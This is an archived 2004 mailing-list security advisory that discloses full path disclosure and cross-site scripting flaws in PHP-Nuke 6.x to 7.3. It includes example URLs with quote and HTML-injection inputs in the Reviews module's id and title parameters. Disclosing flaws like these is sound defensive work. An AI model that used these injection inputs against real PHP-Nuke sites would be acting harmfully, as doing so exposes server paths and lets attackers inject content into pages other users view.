lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <BAY8-F36lnJ2IKkVmkL00064b31@hotmail.com>
From: k1ll3rb0y at hotmail.com (Dark Bicho)
Subject: Multiple vulnerabilities PHP-Nuke

original advisory : http://bichosoft.webcindario.com/advisory-05.txt

-------------------------------------------------------------------------------------------------

                            :.: Multiple vulnerabilities PHP-Nuke :.:

  PROGRAM: PHP-Nuke
  HOMEPAGE: http://phpnuke.org/
  VERSION: 6.x, 7.2, 7.3
  BUG: Multiple vulnerabilities
  DATE:  14/05/2004
  AUTHOR: DarkBicho
          web: http://www.darkbicho.tk
          team: Security Wari Proyects <www.swp-zone.org>
          Email: darkbicho@...u.com

-------------------------------------------------------------------------------------------------


1.- Affected software description:
    -----------------------------

    Php-Nuke is a popular content management system, written in php by
    Francisco Burzi.

2.- Vulnerabilities:
    ---------------

A. Full path disclosure:

    This vulnerability would allow a remote user to determine the full
    path to the web root directory and other potentially sensitive 
information.

    :.: Examples:

    
http://localhost/nuke1/modules.php?name=Reviews&rop=showcontent&id='DarkBicho

    Warning: date(): Windows does not support dates prior to midnight 
(00:00:00),
    January 1, 1970 in c:\appserv\www\nuke1\modules\Reviews\index.php on 
line 527

B. Cross-Site Scripting aka XSS:

    :.: id :

    * 
http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&title=a

    <input type=hidden name=id value='>

    :.: title :

    * 
http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&title=a

    :.: Examples:

    
http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='<h1>DarkBicho</h1&title=a
    
http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&title=<h1>DarkBicho</h1>


3.- SOLUTION:
     ????????
    Vendors were contacted many weeks ago and plan to release a fixed 
version soon.
    Check the PHP-NUKE website for updates and official release details.


4.- Greetings:
    ---------

    greetings to my Peruvian group swp and perunderforce :D
    "EL PISCO ES Y SERA PERUANO"


5.- Contact
    -------

	WEB: http://www.darkbicho.tk
	EMAIL: darkbicho@...u.com

-------------------------------------------------------------------------------------------------
                                ___________      ____________
                               /   _____/  \    /  \______   \
                               \_____  \\   \/\/   /|     ___/
                              /        \\        / |    |
                             /_______  / \__/\  /  |____|
                             \/       \/

                                Security Wari Projects
                                  (c) 2002 - 2004
		                    Made in Peru

----------------------------------------[   EOF    
]----------------------------------------------

_________________________________________________________________
Consigue aqu? las mejores y mas recientes ofertas de trabajo en Am?rica 
Latina y USA: http://latam.msn.com/empleos/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ